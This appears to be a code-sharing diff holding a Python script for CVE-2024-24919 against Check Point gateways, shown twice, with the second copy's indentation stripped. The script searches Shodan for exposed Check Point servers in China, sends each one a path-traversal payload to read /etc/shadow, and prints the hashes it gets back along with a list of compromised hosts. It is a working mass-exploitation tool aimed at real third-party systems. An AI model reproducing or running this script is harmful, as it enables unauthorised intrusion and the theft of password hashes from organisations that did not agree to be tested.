dmknght · July 1, 2024 15:34
diff --git a/CheckPoint_CVE-2024-24919_Shodan.py b/CheckPoint_CVE-2024-24919_Shodan.py
 #!/usr/bin/python3

 import os
 import requests
 from shodan import Shodan


 API_KEY_PATH = os.path.expanduser("~/.config/shodan/api_key") # read API key from config file
 KEYWORD = "country:cn http.status:200 \"Server: Check Point SVN foundation\""
 URL_REQ = "/clients/MyCRL"
 PAYLOAD = "aCSHELL/../../../../../../../etc/shadow"

 api = Shodan(open(API_KEY_PATH, "r").read())
 exploited_host = []

 try:
    for host in api.search_cursor(KEYWORD):
        url = ""
        if host["port"] == 80:
            url = "http://"
        else:
            url = "https://"
        # Add port so it works when port is a custom value
        url += host["ip_str"] + ":" + str(host["port"]) + URL_REQ
        print("==============")
        print("----> " + url)
        try:
            expl = requests.post(url, data=PAYLOAD, verify=False, timeout=5)
            if expl.status_code == 200:
                if not ":::" in expl.text or "<div>" in expl.text or "<title>" in expl.text:
                    print(" ** Invalid response format")
                else:
                    exploited_host.append({"ip": host["ip_str"], "port": host["port"], "org": host["org"]})
                    print(expl.text)
            else:
                print(" ** Response is not 200")
        except KeyboardInterrupt:
            print("Exit!!!!")
            break
        except:
            print("Error connecting to host")
        finally:
            print("-----------------")
 except:
    pass

 print(str(len(exploited_host)) + " are vulnerable")
 print(exploited_host)
	#!/usr/bin/python3

	import os
	import requests
	from shodan import Shodan


	API_KEY_PATH = os.path.expanduser("~/.config/shodan/api_key") # read API key from config file
	KEYWORD = "country:cn http.status:200 \"Server: Check Point SVN foundation\""
	URL_REQ = "/clients/MyCRL"
	PAYLOAD = "aCSHELL/../../../../../../../etc/shadow"

	api = Shodan(open(API_KEY_PATH, "r").read())
	exploited_host = []

	try:
	for host in api.search_cursor(KEYWORD):
	url = ""
	if host["port"] == 80:
	url = "http://"
	else:
	url = "https://"
	# Add port so it works when port is a custom value
	url += host["ip_str"] + ":" + str(host["port"]) + URL_REQ
	print("==============")
	print("----> " + url)
	try:
	expl = requests.post(url, data=PAYLOAD, verify=False, timeout=5)
	if expl.status_code == 200:
	if not ":::" in expl.text or "<div>" in expl.text or "<title>" in expl.text:
	print(" ** Invalid response format")
	else:
	exploited_host.append({"ip": host["ip_str"], "port": host["port"], "org": host["org"]})
	print(expl.text)
	else:
	print(" ** Response is not 200")
	except KeyboardInterrupt:
	print("Exit!!!!")
	break
	except:
	print("Error connecting to host")
	finally:
	print("-----------------")
	except:
	pass

	print(str(len(exploited_host)) + " are vulnerable")
	print(exploited_host)